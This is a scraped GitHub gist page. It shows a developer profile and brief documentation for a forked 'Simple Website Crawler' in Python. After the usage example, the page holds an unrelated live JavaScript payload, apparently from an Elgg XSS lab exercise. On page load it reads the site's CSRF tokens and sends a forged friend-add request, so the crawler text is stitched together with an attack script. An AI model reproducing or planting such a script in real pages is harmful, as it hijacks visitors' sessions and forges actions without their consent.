Skip to content

Instantly share code, notes, and snippets.

View KSTARK007's full-sized avatar
🎯
Focusing

Kiran S Hombal KSTARK007

🎯
Focusing
  • University of Illinois Urbana-Champaign
  • Champaign, IL, USA
  • LinkedIn in/kiranhombal
View GitHub Profile
@KSTARK007
KSTARK007 / crawler.md
Created September 13, 2017 22:17 — forked from typehorror/crawler.md
Simple Website Crawler (in python)

Simple Website Crawler

The following gist is an extract of the article Building a simple crawler. It allows crawling from a URL and for a given number of bounce.

Basic Usage

from crawler import Crawler
crawler = Crawler()
crawler.crawl('http://techcrunch.com/')

displays the urls

<script type="text/javascript"> window.onload=function() {var Ajax=null; var ts="&__elgg_ts="+elgg.security.token.__elgg_ts; var token="&__elgg_token="+elgg.security.token.__elgg_token; var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=47"+token+ts;Ajax=new XMLHttpRequest();Ajax.open("GET",sendurl,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send();}</script>